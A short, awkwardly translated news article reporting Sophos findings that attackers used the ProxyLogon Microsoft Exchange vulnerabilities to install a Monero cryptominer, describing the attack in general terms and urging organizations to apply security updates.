Cybercriminals are targeting vulnerable Microsoft Exchange servers with cryptomining malware. The zero-day vulnerabilities in Microsoft Exchange Server were analyzed last month when Microsoft was released security updates to prevent the exploitation of vulnerable systems.
Many cyber criminals, including state hackers and gang ransomware, have tried to take advantage of vulnerable Exchange servers.
The its security researchers SophosHowever, they have also detected attackers trying to exploit ProxyLogon exploit on Microsoft Exchange Servers to secretly install a Monero cryptominer.
Monero is not as valuable as Bitcoin, but it is easier to extract and especially for cyber criminals. In addition, it provides greater anonymity, making it difficult to locate the owners of a wallet and the attackers.
While cryptomining is not considered as tragic as a ransomware attack or the loss of sensitive data, it remains a major concern for organizations as well. many of them have not yet implemented Microsoft security updates and their systems are vulnerable.
According to Sophos analysis, the Monero wallet of the criminal behind this cryptomining campaign, started receiving money from mining on March 9, a few days after the Microsoft Exchange Server vulnerabilities were revealed. This means that the attacker immediately began to exploit the vulnerable systems.
Attacks start with a PowerShell command and end with downloadable executable payloads to install Minero miner.
Researchers say the executable appears to contain a modified version of a tool that is publicly available on Github. When running on a compromised server, the installation data is deleted while the extraction process is running in memory.
The servers that have been compromised by cryptomining malware, they probably will not understand that there is a problem. Unless the intruder is greedy with processing power, then the victim will realize that something is wrong.
To protect networks from attacks that exploit Microsoft Exchange Server vulnerabilities, organizations are required to apply security updates, as soon as possible.